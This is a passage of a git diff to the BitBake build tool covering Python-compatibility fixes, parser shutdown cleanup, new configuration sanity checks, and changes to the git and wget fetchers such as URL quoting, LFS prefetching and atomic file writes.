+        except (Exception, SystemExit) as exc:
             if quieterr:
                 event.fire(TaskFailedSilent(task, fn, logfn, localdata), localdata)
             else:
                 errprinted = errchk.triggered
+                # If the output is already on stdout, we've printed the information in the
+                # logs once already so don't duplicate
+                if verboseStdoutLogging:
+                    errprinted = True
                 logger.error(str(exc))
                 event.fire(TaskFailed(task, fn, logfn, localdata, errprinted), localdata)
             return 1
@@ -901,6 +908,8 @@ def tasksbetween(task_start, task_end, d):
     def follow_chain(task, endtask, chain=None):
         if not chain:
             chain = []
+        if task in chain:
+            bb.fatal("Circular task dependencies as %s depends on itself via the chain %s" % (task, " -> ".join(chain)))
         chain.append(task)
         for othertask in tasks:
             if othertask == task:
diff --git a/bitbake/lib/bb/command.py b/bitbake/lib/bb/command.py
index 6abf38668b..b8429b2773 100644
--- a/bitbake/lib/bb/command.py
+++ b/bitbake/lib/bb/command.py
@@ -20,6 +20,7 @@ Commands are queued in a CommandQueue
 
 from collections import OrderedDict, defaultdict
 
+import io
 import bb.event
 import bb.cooker
 import bb.remotedata
@@ -74,8 +75,12 @@ class Command:
                 result = command_method(self, commandline)
             except CommandError as exc:
                 return None, exc.args[0]
-            except (Exception, SystemExit):
+            except (Exception, SystemExit) as exc:
                 import traceback
+                if isinstance(exc, bb.BBHandledException):
+                    # We need to start returning real exceptions here. Until we do, we can't
+                    # tell if an exception is an instance of bb.BBHandledException
+                    return None, "bb.BBHandledException()\n" + traceback.format_exc()
                 return None, traceback.format_exc()
             else:
                 return result, None
@@ -474,6 +479,17 @@ class CommandsSync:
         d = command.remotedatastores[dsindex].varhistory
         return getattr(d, method)(*args, **kwargs)
 
+    def dataStoreConnectorVarHistCmdEmit(self, command, params):
+        dsindex = params[0]
+        var = params[1]
+        oval = params[2]
+        val = params[3]
+        d = command.remotedatastores[params[4]]
+
+        o = io.StringIO()
+        command.remotedatastores[dsindex].varhistory.emit(var, oval, val, o, d)
+        return o.getvalue()
+
     def dataStoreConnectorIncHistCmd(self, command, params):
         dsindex = params[0]
         method = params[1]
@@ -620,6 +636,16 @@ class CommandsAsync:
         command.finishAsyncCommand()
     findFilesMatchingInDir.needcache = False
 
+    def testCookerCommandEvent(self, command, params):
+        """
+        Dummy command used by OEQA selftest to test tinfoil without IO
+        """
+        pattern = params[0]
+
+        command.cooker.testCookerCommandEvent(pattern)
+        command.finishAsyncCommand()
+    testCookerCommandEvent.needcache = False
+
     def findConfigFilePath(self, command, params):
         """
         Find the path of the requested configuration file
diff --git a/bitbake/lib/bb/compat.py b/bitbake/lib/bb/compat.py
deleted file mode 100644
index 49356681ab..0000000000
--- a/bitbake/lib/bb/compat.py
+++ /dev/null
@@ -1,10 +0,0 @@
-#
-# SPDX-License-Identifier: GPL-2.0-only
-#
-
-"""Code pulled from future python versions, here for compatibility"""
-
-from collections import MutableMapping, KeysView, ValuesView, ItemsView, OrderedDict
-from functools import total_ordering
-
-
diff --git a/bitbake/lib/bb/cooker.py b/bitbake/lib/bb/cooker.py
index d90bd3945f..6743bce585 100644
--- a/bitbake/lib/bb/cooker.py
+++ b/bitbake/lib/bb/cooker.py
@@ -13,7 +13,6 @@ import sys, os, glob, os.path, re, time
 import itertools
 import logging
 import multiprocessing
-import sre_constants
 import threading
 from io import StringIO, UnsupportedOperation
 from contextlib import closing
@@ -411,10 +410,7 @@ class BBCooker:
             self.data.disableTracking()
 
     def parseConfiguration(self):
-        # Set log file verbosity
-        verboselogs = bb.utils.to_boolean(self.data.getVar("BB_VERBOSE_LOGS", False))
-        if verboselogs:
-            bb.msg.loggerVerboseLogs = True
+        self.updateCacheSync()
 
         # Change nice level if we're asked to
         nice = self.data.getVar("BB_NICE_LEVEL")
@@ -1022,6 +1018,11 @@ class BBCooker:
         if matches:
             bb.event.fire(bb.event.FilesMatchingFound(filepattern, matches), self.data)
 
+    def testCookerCommandEvent(self, filepattern):
+        # Dummy command used by OEQA selftest to test tinfoil without IO
+        matches = ["A", "B"]
+        bb.event.fire(bb.event.FilesMatchingFound(filepattern, matches), self.data)
+
     def findProviders(self, mc=''):
         return bb.providers.findProviders(self.databuilder.mcdata[mc], self.recipecaches[mc], self.recipecaches[mc].pkg_pn)
 
@@ -1636,6 +1637,7 @@ class BBCooker:
         return
 
     def post_serve(self):
+        self.shutdown(force=True)
         prserv.serv.auto_shutdown()
         if self.hashserv:
             self.hashserv.process.terminate()
@@ -1650,6 +1652,7 @@ class BBCooker:
 
         if self.parser:
             self.parser.shutdown(clean=not force, force=force)
+            self.parser.final_cleanup()
 
     def finishcommand(self):
         self.state = state.initial
@@ -1791,7 +1794,7 @@ class CookerCollectFiles(object):
                 try:
                     re.compile(mask)
                     bbmasks.append(mask)
-                except sre_constants.error:
+                except re.error:
                     collectlog.critical("BBMASK contains an invalid regular expression, ignoring: %s" % mask)
 
             # Then validate the combined regular expressions. This should never
@@ -1799,7 +1802,7 @@ class CookerCollectFiles(object):
             bbmask = "|".join(bbmasks)
             try:
                 bbmask_compiled = re.compile(bbmask)
-            except sre_constants.error:
+            except re.error:
                 collectlog.critical("BBMASK is not a valid regular expression, ignoring: %s" % bbmask)
                 bbmask = None
 
@@ -1931,7 +1934,8 @@ class Parser(multiprocessing.Process):
             except queue.Empty:
                 pass
             else:
-                self.results.cancel_join_thread()
+                self.results.close()
+                self.results.join_thread()
                 break
 
             if pending:
@@ -1940,6 +1944,8 @@ class Parser(multiprocessing.Process):
                 try:
                     job = self.jobs.pop()
                 except IndexError:
+                    self.results.close()
+                    self.results.join_thread()
                     break
                 result = self.parse(*job)
                 # Clear the siggen cache after parsing to control memory usage, its huge
@@ -2015,6 +2021,7 @@ class CookerParser(object):
 
         self.start()
         self.haveshutdown = False
+        self.syncthread = None
 
     def start(self):
         self.results = self.load_cached()
@@ -2056,12 +2063,9 @@ class CookerParser(object):
                                             self.total)
 
             bb.event.fire(event, self.cfgdata)
-            for process in self.processes:
-                self.parser_quit.put(None)
-        else:
-            self.parser_quit.cancel_join_thread()
-            for process in self.processes:
-                self.parser_quit.put(None)
+
+        for process in self.processes:
+            self.parser_quit.put(None)
 
         # Cleanup the queue before call process.join(), otherwise there might be
         # deadlocks.
@@ -2078,9 +2082,13 @@ class CookerParser(object):
             else:
                 process.join()
 
+        self.parser_quit.close()
+        # Allow data left in the cancel queue to be discarded
+        self.parser_quit.cancel_join_thread()
+
         sync = threading.Thread(target=self.bb_cache.sync)
+        self.syncthread = sync
         sync.start()
-        multiprocessing.util.Finalize(None, sync.join, exitpriority=-100)
         bb.codeparser.parser_cache_savemerge()
         bb.fetch.fetcher_parse_done()
         if self.cooker.configuration.profile:
@@ -2094,6 +2102,10 @@ class CookerParser(object):
             bb.utils.process_profilelog(profiles, pout = pout)
             print("Processed parsing statistics saved to %s" % (pout))
 
+    def final_cleanup(self):
+        if self.syncthread:
+            self.syncthread.join()
+
     def load_cached(self):
         for filename, appends in self.fromcache:
             cached, infos = self.bb_cache.load(filename, appends)
@@ -2126,18 +2138,18 @@ class CookerParser(object):
         except bb.BBHandledException as exc:
             self.error += 1
             logger.error('Failed to parse recipe: %s' % exc.recipe)
-            self.shutdown(clean=False)
+            self.shutdown(clean=False, force=True)
             return False
         except ParsingFailure as exc:
             self.error += 1
             logger.error('Unable to parse %s: %s' %
                      (exc.recipe, bb.exceptions.to_string(exc.realexception)))
-            self.shutdown(clean=False)
+            self.shutdown(clean=False, force=True)
             return False
         except bb.parse.ParseError as exc:
             self.error += 1
             logger.error(str(exc))
-            self.shutdown(clean=False)
+            self.shutdown(clean=False, force=True)
             return False
         except bb.data_smart.ExpansionError as exc:
             self.error += 1
@@ -2146,7 +2158,7 @@ class CookerParser(object):
             tb = list(itertools.dropwhile(lambda e: e.filename.startswith(bbdir), exc.traceback))
             logger.error('ExpansionError during parsing %s', value.recipe,
                          exc_info=(etype, value, tb))
-            self.shutdown(clean=False)
+            self.shutdown(clean=False, force=True)
             return False
         except Exception as exc:
             self.error += 1
@@ -2158,7 +2170,7 @@ class CookerParser(object):
                 # Most likely, an exception occurred during raising an exception
                 import traceback
                 logger.error('Exception during parse: %s' % traceback.format_exc())
-            self.shutdown(clean=False)
+            self.shutdown(clean=False, force=True)
             return False
 
         self.current += 1
diff --git a/bitbake/lib/bb/cookerdata.py b/bitbake/lib/bb/cookerdata.py
index 472423fdc8..30727bf2ee 100644
--- a/bitbake/lib/bb/cookerdata.py
+++ b/bitbake/lib/bb/cookerdata.py
@@ -58,11 +58,14 @@ class ConfigParameters(object):
     def updateToServer(self, server, environment):
         options = {}
         for o in ["abort", "force", "invalidate_stamp",
-                  "verbose", "debug", "dry_run", "dump_signatures",
+                  "debug", "dry_run", "dump_signatures",
                   "debug_domains", "extra_assume_provided", "profile",
                   "prefile", "postfile", "server_timeout"]:
             options[o] = getattr(self.options, o)
 
+        options['build_verbose_shell'] = self.options.verbose
+        options['build_verbose_stdout'] = self.options.verbose
+
         ret, error = server.runCommand(["updateConfig", options, environment, sys.argv])
         if error:
             raise Exception("Unable to update the server configuration with local parameters: %s" % error)
@@ -125,6 +128,8 @@ class CookerConfiguration(object):
         self.skipsetscene = False
         self.invalidate_stamp = False
         self.dump_signatures = []
+        self.build_verbose_shell = False
+        self.build_verbose_stdout = False
         self.dry_run = False
         self.tracking = False
         self.xmlrpcinterface = []
@@ -297,6 +302,8 @@ class CookerDataBuilder(object):
 
             multiconfig = (self.data.getVar("BBMULTICONFIG") or "").split()
             for config in multiconfig:
+                if config[0].isdigit():
+                    bb.fatal("Multiconfig name '%s' is invalid as multiconfigs cannot start with a digit" % config)
                 mcdata = self.parseConfigurationFiles(self.prefiles, self.postfiles, config)
                 bb.event.fire(bb.event.ConfigParsed(), mcdata)
                 self.mcdata[config] = mcdata
@@ -348,6 +355,9 @@ class CookerDataBuilder(object):
             layers = (data.getVar('BBLAYERS') or "").split()
             broken_layers = []
 
+            if not layers:
+                bb.fatal("The bblayers.conf file doesn't contain any BBLAYERS definition")
+
             data = bb.data.createCopy(data)
             approved = bb.utils.approved_variables()
 
@@ -399,6 +409,8 @@ class CookerDataBuilder(object):
                 if c in collections_tmp:
                     bb.fatal("Found duplicated BBFILE_COLLECTIONS '%s', check bblayers.conf or layer.conf to fix it." % c)
                 compat = set((data.getVar("LAYERSERIES_COMPAT_%s" % c) or "").split())
+                if compat and not layerseries:
+                    bb.fatal("No core layer found to work with layer '%s'. Missing entry in bblayers.conf?" % c)
                 if compat and not (compat & layerseries):
                     bb.fatal("Layer %s is not compatible with the core layer which only supports these series: %s (layer is compatible with %s)"
                               % (c, " ".join(layerseries), " ".join(compat)))
diff --git a/bitbake/lib/bb/data.py b/bitbake/lib/bb/data.py
index b0683c5180..1d21e00a1c 100644
--- a/bitbake/lib/bb/data.py
+++ b/bitbake/lib/bb/data.py
@@ -301,6 +301,7 @@ def build_dependencies(key, keys, shelldeps, varflagsexcl, d):
                 value += "\n_remove of %s" % r
                 deps |= r2.references
                 deps = deps | (keys & r2.execs)
+                value = handle_contains(value, r2.contains, d)
             return value
 
         if "vardepvalue" in varflags:
diff --git a/bitbake/lib/bb/data_smart.py b/bitbake/lib/bb/data_smart.py
index 7f1b6dcb4f..c46d3f0a08 100644
--- a/bitbake/lib/bb/data_smart.py
+++ b/bitbake/lib/bb/data_smart.py
@@ -17,7 +17,7 @@ BitBake build tools.
 # Based on functions from the base bb module, Copyright 2003 Holger Schurig
 
 import copy, re, sys, traceback
-from collections import MutableMapping
+from collections.abc import MutableMapping
 import logging
 import hashlib
 import bb, bb.codeparser
@@ -28,7 +28,7 @@ logger = logging.getLogger("BitBake.Data")
 
 __setvar_keyword__ = ["_append", "_prepend", "_remove"]
 __setvar_regexp__ = re.compile(r'(?P<base>.*?)(?P<keyword>_append|_prepend|_remove)(_(?P<add>[^A-Z]*))?$')
-__expand_var_regexp__ = re.compile(r"\${[a-zA-Z0-9\-_+./~]+?}")
+__expand_var_regexp__ = re.compile(r"\${[a-zA-Z0-9\-_+./~:]+?}")
 __expand_python_regexp__ = re.compile(r"\${@.+?}")
 __whitespace_split__ = re.compile(r'(\s)')
 __override_regexp__ = re.compile(r'[a-z0-9]+')
@@ -403,7 +403,7 @@ class DataSmart(MutableMapping):
                     s = __expand_python_regexp__.sub(varparse.python_sub, s)
                 except SyntaxError as e:
                     # Likely unmatched brackets, just don't expand the expression
-                    if e.msg != "EOL while scanning string literal":
+                    if e.msg != "EOL while scanning string literal" and not e.msg.startswith("unterminated string literal"):
                         raise
                 if s == olds:
                     break
@@ -411,6 +411,8 @@ class DataSmart(MutableMapping):
                 raise
             except bb.parse.SkipRecipe:
                 raise
+            except bb.BBHandledException:
+                raise
             except Exception as exc:
                 tb = sys.exc_info()[2]
                 raise ExpansionError(varname, s, exc).with_traceback(tb) from exc
@@ -481,6 +483,7 @@ class DataSmart(MutableMapping):
 
     def setVar(self, var, value, **loginfo):
         #print("var=" + str(var) + "  val=" + str(value))
+        var = var.replace(":", "_")
         self.expand_cache = {}
         parsing=False
         if 'parsing' in loginfo:
@@ -589,6 +592,8 @@ class DataSmart(MutableMapping):
         """
         Rename the variable key to newkey
         """
+        key = key.replace(":", "_")
+        newkey = newkey.replace(":", "_")
         if key == newkey:
             bb.warn("Calling renameVar with equivalent keys (%s) is invalid" % key)
             return
@@ -637,6 +642,7 @@ class DataSmart(MutableMapping):
         self.setVar(var + "_prepend", value, ignore=True, parsing=True)
 
     def delVar(self, var, **loginfo):
+        var = var.replace(":", "_")
         self.expand_cache = {}
 
         loginfo['detail'] = ""
@@ -664,6 +670,7 @@ class DataSmart(MutableMapping):
                          override = None
 
     def setVarFlag(self, var, flag, value, **loginfo):
+        var = var.replace(":", "_")
         self.expand_cache = {}
 
         if 'op' not in loginfo:
@@ -687,6 +694,7 @@ class DataSmart(MutableMapping):
             self.dict["__exportlist"]["_content"].add(var)
 
     def getVarFlag(self, var, flag, expand=True, noweakdefault=False, parsing=False, retparser=False):
+        var = var.replace(":", "_")
         if flag == "_content":
             cachename = var
         else:
@@ -814,6 +822,7 @@ class DataSmart(MutableMapping):
         return value
 
     def delVarFlag(self, var, flag, **loginfo):
+        var = var.replace(":", "_")
         self.expand_cache = {}
 
         local_var, _ = self._findVar(var)
@@ -831,6 +840,7 @@ class DataSmart(MutableMapping):
             del self.dict[var][flag]
 
     def appendVarFlag(self, var, flag, value, **loginfo):
+        var = var.replace(":", "_")
         loginfo['op'] = 'append'
         loginfo['flag'] = flag
         self.varhistory.record(**loginfo)
@@ -838,6 +848,7 @@ class DataSmart(MutableMapping):
         self.setVarFlag(var, flag, newvalue, ignore=True)
 
     def prependVarFlag(self, var, flag, value, **loginfo):
+        var = var.replace(":", "_")
         loginfo['op'] = 'prepend'
         loginfo['flag'] = flag
         self.varhistory.record(**loginfo)
@@ -845,6 +856,7 @@ class DataSmart(MutableMapping):
         self.setVarFlag(var, flag, newvalue, ignore=True)
 
     def setVarFlags(self, var, flags, **loginfo):
+        var = var.replace(":", "_")
         self.expand_cache = {}
         infer_caller_details(loginfo)
         if not var in self.dict:
@@ -859,6 +871,7 @@ class DataSmart(MutableMapping):
             self.dict[var][i] = flags[i]
 
     def getVarFlags(self, var, expand = False, internalflags=False):
+        var = var.replace(":", "_")
         local_var, _ = self._findVar(var)
         flags = {}
 
@@ -875,6 +888,7 @@ class DataSmart(MutableMapping):
 
 
     def delVarFlags(self, var, **loginfo):
+        var = var.replace(":", "_")
         self.expand_cache = {}
         if not var in self.dict:
             self._makeShadowCopy(var)
@@ -1005,7 +1019,7 @@ class DataSmart(MutableMapping):
             else:
                 data.update({key:value})
 
-            varflags = d.getVarFlags(key, internalflags = True)
+            varflags = d.getVarFlags(key, internalflags = True, expand=["vardepvalue"])
             if not varflags:
                 continue
             for f in varflags:
diff --git a/bitbake/lib/bb/event.py b/bitbake/lib/bb/event.py
index d1359f0100..cb0b3b3345 100644
--- a/bitbake/lib/bb/event.py
+++ b/bitbake/lib/bb/event.py
@@ -10,17 +10,17 @@ BitBake build tools.
 # SPDX-License-Identifier: GPL-2.0-only
 #
 
-import sys
-import pickle
-import logging
-import atexit
-import traceback
 import ast
+import atexit
+import collections
+import logging
+import pickle
+import sys
 import threading
+import traceback
 
-import bb.utils
-import bb.compat
 import bb.exceptions
+import bb.utils
 
 # This is the pid for which we should generate the event. This is set when
 # the runqueue forks off.
@@ -56,7 +56,7 @@ def set_class_handlers(h):
     _handlers = h
 
 def clean_class_handlers():
-    return bb.compat.OrderedDict()
+    return collections.OrderedDict()
 
 # Internal
 _handlers = clean_class_handlers()
diff --git a/bitbake/lib/bb/fetch2/__init__.py b/bitbake/lib/bb/fetch2/__init__.py
index eb112f069d..3e6555bd67 100644
--- a/bitbake/lib/bb/fetch2/__init__.py
+++ b/bitbake/lib/bb/fetch2/__init__.py
@@ -562,6 +562,9 @@ def verify_checksum(ud, d, precomputed={}):
 
         checksum_expected = getattr(ud, "%s_expected" % checksum_id)
 
+        if checksum_expected == '':
+            checksum_expected = None
+
         return {
             "id": checksum_id,
             "name": checksum_name,
@@ -612,7 +615,7 @@ def verify_checksum(ud, d, precomputed={}):
 
     for ci in checksum_infos:
         if ci["expected"] and ci["expected"] != ci["data"]:
-            messages.append("File: '%s' has %s checksum %s when %s was " \
+            messages.append("File: '%s' has %s checksum '%s' when '%s' was " \
                             "expected" % (ud.localpath, ci["id"], ci["data"], ci["expected"]))
             bad_checksum = ci["data"]
 
@@ -853,11 +856,6 @@ def runfetchcmd(cmd, d, quiet=False, cleanup=None, log=None, workdir=None):
         if val:
             cmd = 'export ' + var + '=\"%s\"; %s' % (val, cmd)
 
-    # Ensure that a _PYTHON_SYSCONFIGDATA_NAME value set by a recipe
-    # (for example via python3native.bbclass since warrior) is not set for
-    # host Python (otherwise tools like git-make-shallow will fail)
-    cmd = 'unset _PYTHON_SYSCONFIGDATA_NAME; ' + cmd
-
     # Disable pseudo as it may affect ssh, potentially causing it to hang.
     cmd = 'export PSEUDO_DISABLED=1; ' + cmd
 
diff --git a/bitbake/lib/bb/fetch2/git.py b/bitbake/lib/bb/fetch2/git.py
index dcecff5d38..cad1ae8207 100644
--- a/bitbake/lib/bb/fetch2/git.py
+++ b/bitbake/lib/bb/fetch2/git.py
@@ -44,7 +44,8 @@ Supported SRC_URI options are:
 
 - nobranch
    Don't check the SHA validation for branch. set this option for the recipe
-   referring to commit which is valid in tag instead of branch.
+   referring to commit which is valid in any namespace (branch, tag, ...)
+   instead of branch.
    The default is "0", set nobranch=1 if needed.
 
 - usehead
@@ -63,10 +64,12 @@ import errno
 import fnmatch
 import os
 import re
+import shlex
 import subprocess
 import tempfile
 import bb
 import bb.progress
+from contextlib import contextmanager
 from   bb.fetch2 import FetchMethod
 from   bb.fetch2 import runfetchcmd
 from   bb.fetch2 import logger
@@ -140,6 +143,10 @@ class Git(FetchMethod):
             ud.proto = 'file'
         else:
             ud.proto = "git"
+        if ud.host == "github.com" and ud.proto == "git":
+            # github stopped supporting git protocol
+            # https://github.blog/2021-09-01-improving-git-protocol-security-github/#no-more-unauthenticated-git
+            ud.proto = "https"
 
         if not ud.proto in ('git', 'file', 'ssh', 'http', 'https', 'rsync'):
             raise bb.fetch2.ParameterError("Invalid protocol type", ud.url)
@@ -219,7 +226,12 @@ class Git(FetchMethod):
             ud.shallow = False
 
         if ud.usehead:
-            ud.unresolvedrev['default'] = 'HEAD'
+            # When usehead is set let's associate 'HEAD' with the unresolved
+            # rev of this repository. This will get resolved into a revision
+            # later. If an actual revision happens to have also been provided
+            # then this setting will be overridden.
+            for name in ud.names:
+                ud.unresolvedrev[name] = 'HEAD'
 
         ud.basecmd = d.getVar("FETCHCMD_git") or "git -c core.fsyncobjectfiles=0"
 
@@ -342,7 +354,7 @@ class Git(FetchMethod):
             # We do this since git will use a "-l" option automatically for local urls where possible
             if repourl.startswith("file://"):
                 repourl = repourl[7:]
-            clone_cmd = "LANG=C %s clone --bare --mirror \"%s\" %s --progress" % (ud.basecmd, repourl, ud.clonedir)
+            clone_cmd = "LANG=C %s clone --bare --mirror %s %s --progress" % (ud.basecmd, shlex.quote(repourl), ud.clonedir)
             if ud.proto.lower() != 'file':
                 bb.fetch2.check_network_access(d, clone_cmd, ud.url)
             progresshandler = GitProgressHandler(d)
@@ -354,8 +366,12 @@ class Git(FetchMethod):
             if "origin" in output:
               runfetchcmd("%s remote rm origin" % ud.basecmd, d, workdir=ud.clonedir)
 
-            runfetchcmd("%s remote add --mirror=fetch origin \"%s\"" % (ud.basecmd, repourl), d, workdir=ud.clonedir)
-            fetch_cmd = "LANG=C %s fetch -f --progress \"%s\" refs/*:refs/*" % (ud.basecmd, repourl)
+            runfetchcmd("%s remote add --mirror=fetch origin %s" % (ud.basecmd, shlex.quote(repourl)), d, workdir=ud.clonedir)
+
+            if ud.nobranch:
+                fetch_cmd = "LANG=C %s fetch -f --progress %s refs/*:refs/*" % (ud.basecmd, shlex.quote(repourl))
+            else:
+                fetch_cmd = "LANG=C %s fetch -f --progress %s refs/heads/*:refs/heads/* refs/tags/*:refs/tags/*" % (ud.basecmd, shlex.quote(repourl))
             if ud.proto.lower() != 'file':
                 bb.fetch2.check_network_access(d, fetch_cmd, ud.url)
             progresshandler = GitProgressHandler(d)
@@ -378,7 +394,50 @@ class Git(FetchMethod):
             if missing_rev:
                 raise bb.fetch2.FetchError("Unable to find revision %s even from upstream" % missing_rev)
 
+        if self._contains_lfs(ud, d, ud.clonedir) and self._need_lfs(ud):
+            # Unpack temporary working copy, use it to run 'git checkout' to force pre-fetching
+            # of all LFS blobs needed at the the srcrev.
+            #
+            # It would be nice to just do this inline here by running 'git-lfs fetch'
+            # on the bare clonedir, but that operation requires a working copy on some
+            # releases of Git LFS.
+            tmpdir = tempfile.mkdtemp(dir=d.getVar('DL_DIR'))
+            try:
+                # Do the checkout. This implicitly involves a Git LFS fetch.
+                Git.unpack(self, ud, tmpdir, d)
+
+                # Scoop up a copy of any stuff that Git LFS downloaded. Merge them into
+                # the bare clonedir.
+                #
+                # As this procedure is invoked repeatedly on incremental fetches as
+                # a recipe's SRCREV is bumped throughout its lifetime, this will
+                # result in a gradual accumulation of LFS blobs in <ud.clonedir>/lfs
+                # corresponding to all the blobs reachable from the different revs
+                # fetched across time.
+                #
+                # Only do this if the unpack resulted in a .git/lfs directory being
+                # created; this only happens if at least one blob needed to be
+                # downloaded.
+                if os.path.exists(os.path.join(tmpdir, "git", ".git", "lfs")):
+                    runfetchcmd("tar -cf - lfs | tar -xf - -C %s" % ud.clonedir, d, workdir="%s/git/.git" % tmpdir)
+            finally:
+                bb.utils.remove(tmpdir, recurse=True)
+
     def build_mirror_data(self, ud, d):
+
+        # Create as a temp file and move atomically into position to avoid races
+        @contextmanager
+        def create_atomic(filename):
+            fd, tfile = tempfile.mkstemp(dir=os.path.dirname(filename))
+            try:
+                yield tfile
+                umask = os.umask(0o666)
+                os.umask(umask)
+                os.chmod(tfile, (0o666 & ~umask))
+                os.rename(tfile, filename)
+            finally:
+                os.close(fd)
+
         if ud.shallow and ud.write_shallow_tarballs:
             if not os.path.exists(ud.fullshallow):
                 if os.path.islink(ud.fullshallow):
@@ -389,7 +448,8 @@ class Git(FetchMethod):
                     self.clone_shallow_local(ud, shallowclone, d)
 
                     logger.info("Creating tarball of git repository")
-                    runfetchcmd("tar -czf %s ." % ud.fullshallow, d, workdir=shallowclone)
+                    with create_atomic(ud.fullshallow) as tfile:
+                        runfetchcmd("tar -czf %s ." % tfile, d, workdir=shallowclone)
                     runfetchcmd("touch %s.done" % ud.fullshallow, d)
                 finally:
                     bb.utils.remove(tempdir, recurse=True)
@@ -398,7 +458,8 @@ class Git(FetchMethod):
                 os.unlink(ud.fullmirror)
 
             logger.info("Creating tarball of git repository")
-            runfetchcmd("tar -czf %s ." % ud.fullmirror, d, workdir=ud.clonedir)
+            with create_atomic(ud.fullmirror) as tfile:
+                runfetchcmd("tar -czf %s ." % tfile, d, workdir=ud.clonedir)
             runfetchcmd("touch %s.done" % ud.fullmirror, d)
 
     def clone_shallow_local(self, ud, dest, d):
@@ -473,7 +534,10 @@ class Git(FetchMethod):
         if os.path.exists(destdir):
             bb.utils.prunedir(destdir)
 
-        need_lfs = ud.parm.get("lfs", "1") == "1"
+        need_lfs = self._need_lfs(ud)
+
+        if not need_lfs:
+            ud.basecmd = "GIT_LFS_SKIP_SMUDGE=1 " + ud.basecmd
 
         source_found = False
         source_error = []
@@ -501,12 +565,12 @@ class Git(FetchMethod):
             raise bb.fetch2.UnpackError("No up to date source found: " + "; ".join(source_error), ud.url)
 
         repourl = self._get_repo_url(ud)
-        runfetchcmd("%s remote set-url origin \"%s\"" % (ud.basecmd, repourl), d, workdir=destdir)
+        runfetchcmd("%s remote set-url origin %s" % (ud.basecmd, shlex.quote(repourl)), d, workdir=destdir)
 
         if self._contains_lfs(ud, d, destdir):
             if need_lfs and not self._find_git_lfs(d):
                 raise bb.fetch2.FetchError("Repository %s has LFS content, install git-lfs on host to download (or set lfs=0 to ignore it)" % (repourl))
-            else:
+            elif not need_lfs:
                 bb.note("Repository %s has LFS content but it is not being fetched" % (repourl))
 
         if not ud.nocheckout:
@@ -559,12 +623,28 @@ class Git(FetchMethod):
             raise bb.fetch2.FetchError("The command '%s' gave output with more then 1 line unexpectedly, output: '%s'" % (cmd, output))
         return output.split()[0] != "0"
 
+    def _need_lfs(self, ud):
+        return ud.parm.get("lfs", "1") == "1"
+
     def _contains_lfs(self, ud, d, wd):
         """
         Check if the repository has 'lfs' (large file) content
         """
-        cmd = "%s grep lfs HEAD:.gitattributes | wc -l" % (
-                ud.basecmd)
+
+        if not ud.nobranch:
+            branchname = ud.branches[ud.names[0]]
+        else:
+            branchname = "master"
+
+        # The bare clonedir doesn't use the remote names; it has the branch immediately.
+        if wd == ud.clonedir:
+            refname = ud.branches[ud.names[0]]
+        else:
+            refname = "origin/%s" % ud.branches[ud.names[0]]
+
+        cmd = "%s grep lfs %s:.gitattributes | wc -l" % (
+            ud.basecmd, refname)
+
         try:
             output = runfetchcmd(cmd, d, quiet=True, workdir=wd)
             if int(output) > 0:
@@ -613,8 +693,8 @@ class Git(FetchMethod):
         d.setVar('_BB_GIT_IN_LSREMOTE', '1')
         try:
             repourl = self._get_repo_url(ud)
-            cmd = "%s ls-remote \"%s\" %s" % \
-                (ud.basecmd, repourl, search)
+            cmd = "%s ls-remote %s %s" % \
+                (ud.basecmd, shlex.quote(repourl), search)
             if ud.proto.lower() != 'file':
                 bb.fetch2.check_network_access(d, cmd, repourl)
             output = runfetchcmd(cmd, d, True)
diff --git a/bitbake/lib/bb/fetch2/wget.py b/bitbake/lib/bb/fetch2/wget.py
index f7d1de26b7..368c644337 100644
--- a/bitbake/lib/bb/fetch2/wget.py
+++ b/bitbake/lib/bb/fetch2/wget.py
@@ -52,6 +52,12 @@ class WgetProgressHandler(bb.progress.LineFilterProgressHandler):
 
 
 class Wget(FetchMethod):
+
+    # CDNs like CloudFlare may do a 'browser integrity test' which can fail
+    # with the standard wget/urllib User-Agent, so pretend to be a modern
+    # browser.
+    user_agent = "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:84.0) Gecko/20100101 Firefox/84.0"
+
     """Class to fetch urls via 'wget'"""
     def supports(self, ud, d):
         """
@@ -91,10 +97,9 @@ class Wget(FetchMethod):
 
         fetchcmd = self.basecmd
 
-        if 'downloadfilename' in ud.parm:
-            localpath = os.path.join(d.getVar("DL_DIR"), ud.localfile)
-            bb.utils.mkdirhier(os.path.dirname(localpath))
-            fetchcmd += " -O %s" % shlex.quote(localpath)
+        localpath = os.path.join(d.getVar("DL_DIR"), ud.localfile) + ".tmp"
+        bb.utils.mkdirhier(os.path.dirname(localpath))
+        fetchcmd += " -O %s" % shlex.quote(localpath)
 
         if ud.user and ud.pswd:
             fetchcmd += " --user=%s --password=%s --auth-no-challenge" % (ud.user, ud.pswd)
@@ -108,6 +113,10 @@ class Wget(FetchMethod):
 
         self._runwget(ud, d, fetchcmd, False)
 
+        # Remove the ".tmp" and move the file into position atomically
+        # Our lock prevents multiple writers but mirroring code may grab incomplete files
+        os.rename(localpath, localpath[:-4])
+
         # Sanity check since wget can pretend it succeed when it didn't
         # Also, this used to happen if sourceforge sent us to the mirror page
         if not os.path.exists(ud.localpath):
@@ -300,7 +309,7 @@ class Wget(FetchMethod):
             # Some servers (FusionForge, as used on Alioth) require that the
             # optional Accept header is set.
             r.add_header("Accept", "*/*")
-            r.add_header("User-Agent", "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.12) Gecko/20101027 Ubuntu/9.10 (karmic) Firefox/3.6.12")
+            r.add_header("User-Agent", self.user_agent)
             def add_basic_auth(login_str, request):
                 '''Adds Basic auth to http request, pass in login:password as string'''
                 import base64
@@ -319,7 +328,7 @@ class Wget(FetchMethod):
             except (TypeError, ImportError, IOError, netrc.NetrcParseError):
                 pass
 
-            with opener.open(r) as response:
+            with opener.open(r, timeout=30) as response:
                 pass
         except urllib.error.URLError as e:
             if try_again:
@@ -404,9 +413,8 @@ class Wget(FetchMethod):
         """
         f = tempfile.NamedTemporaryFile()
         with tempfile.TemporaryDirectory(prefix="wget-index-") as workdir, tempfile.NamedTemporaryFile(dir=workdir, prefix="wget-listing-") as f:
-            agent = "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.12) Gecko/20101027 Ubuntu/9.10 (karmic) Firefox/3.6.12"
             fetchcmd = self.basecmd
-            fetchcmd += " -O " + f.name + " --user-agent='" + agent + "' '" + uri + "'"
+            fetchcmd += " -O " + f.name + " --user-agent='" + self.user_agent + "' '" + uri + "'"
             try:
                 self._runwget(ud, d, fetchcmd, True, workdir=workdir)
                 fetchresult = f.read()
